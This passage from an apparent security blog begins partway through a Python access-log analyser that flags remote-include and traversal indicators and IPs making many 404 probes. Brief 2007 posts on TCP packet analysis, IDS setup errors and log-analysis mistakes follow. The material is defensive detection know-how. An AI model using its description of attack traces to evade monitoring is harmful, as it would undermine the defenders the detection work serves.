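    for line in text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        if entry["status"] == "404":
            not_found[entry["ip"]] += 1
        for name in indicators_for(entry):
            findings.append((name, entry["ip"], entry["target"]))
    scanners = {ip: n for ip, n in not_found.items() if n >= NOT_FOUND_THRESHOLD}
    return findings, scanners


if __name__ == "__main__":
    found, probing = analyze_access_log(SAMPLE_ACCESS_LOG)
    for name, ip, target in found:
        print(f"{name:20} {ip:15} {target}")
    print("sources probing for non-existent files:", probing)
```

Run it as a script to print the findings. The decoding step matters: the attacker's http:// or ../ usually arrives percent-encoded in the raw log, so grepping the undecoded line misses it. The strongest single signal here is the 200 on a path outside the deployed inventory, since a successful include is often followed by exactly that, a new file being served from the web root.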

Friday, March 02, 2007

Deformed TCP Options - Got Packets?

I got this article from SANS. It is about TCP packet analysis. The analysis says the scan may be meant to probe firewall configuration, but it seems the level of crafting involved would be overkill. I'm still new to packet analysis. I think I should improve my knowledge about TCP packet attacks.
http://isc.sans.org/diary.html?storyid=2328

Saturday, February 24, 2007

Avoid these five common IDS implementation errors

Intrusion detection systems can go a long way toward keeping hackers from penetrating your network. However, they only work if you set them up properly. Here are five common errors and how you can avoid them:
  • Ignoring frequent false positives
  • Avoiding IPSec to support NIDS
  • Monitoring only inbound connections
  • Using shared network resources to gather NIDS data
  • Trusting IDS analysis to non-expert analysts
You can read the full article here:
http://articles.techrepublic.com.com/5100-6350-5785230.html

Friday, February 02, 2007

Five Mistakes of Security Log Analysis

At the DoD Cybercrime Conference 2007 in St. Louis, Missouri, Anton Chuvakin gave a talk about the "Five Mistakes of Security Log Analysis". Anton talks about the operational security challenges that organizations face while deploying log and alert collection and analysis infrastructure. You can refer here for his presentation.
You can also refer to his earlier article for Computerworld. I think this article is useful for us. Chuvakin highlights the top five most common mistakes organizations make in this process:
1: Not looking at the logs
2: Storing logs for too short a time
3: Not normalizing logs
4: Failing to prioritize log records
5: Looking for only the bad stuff

p/s: I think NSM is one solution to these five mistakes, reducing the problems with the IDS that I'm still using......hehehhee....